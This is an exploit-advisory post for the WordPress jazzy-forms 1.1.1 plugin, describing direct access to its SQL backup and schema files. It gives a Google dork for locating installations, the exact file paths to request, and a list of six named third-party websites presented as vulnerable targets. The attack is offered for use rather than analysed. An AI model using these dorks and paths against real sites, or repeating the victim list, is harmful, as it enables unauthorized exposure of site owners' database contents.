################################################################################################# # Exploit Title : WordPress jazzy-forms Plugins 1.1.1 Database Backup Information Disclosure Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 30/11/2018 # Vendor Homepage : wordpress.org/plugins/jazzy-forms/ # Software Download Link : downloads.wordpress.org/plugin/jazzy-forms.zip + github.com/allhandsactive/AllHandsActive.com/tree/master/wp-content/plugins/jazzy-forms # Tested On : Windows and Linux # Category : WebApps # Version Information : 1.1.1 # Google Dorks : inurl:''/wp-content/plugins/jazzy-forms/'' # Exploit Risk : Medium # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ] CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ] CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # Exploit : /wp-content/plugins/jazzy-forms/panic.sql /wp-content/plugins/jazzy-forms/generated/drop.sql /wp-content/plugins/jazzy-forms/generated/schema.sql /wp-content/plugins/jazzy-forms/generated/update.sql ################################################################################################# # Example Vulnerable Sites => [+] gleencloth.com/wp-content/plugins/jazzy-forms/generated/drop.sql [+] dannyrod.com/wp-content/plugins/jazzy-forms/panic.sql [+] phoenixfretworks.com/wordpresstest/wp-content/plugins/jazzy-forms/generated/update.sql [+] morifuji.me/wp/wp-content/plugins/jazzy-forms/panic.sql [+] aluguervirtual.com/wp-content/plugins/jazzy-forms/generated/schema.sql [+] mclvt.org/wp-content/plugins/jazzy-forms/generated/schema.sql ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################